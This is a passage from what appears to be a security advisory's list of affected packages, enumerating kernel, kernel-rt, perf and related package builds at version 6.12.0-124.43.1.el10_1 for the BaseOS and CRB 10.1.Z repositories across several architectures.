"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
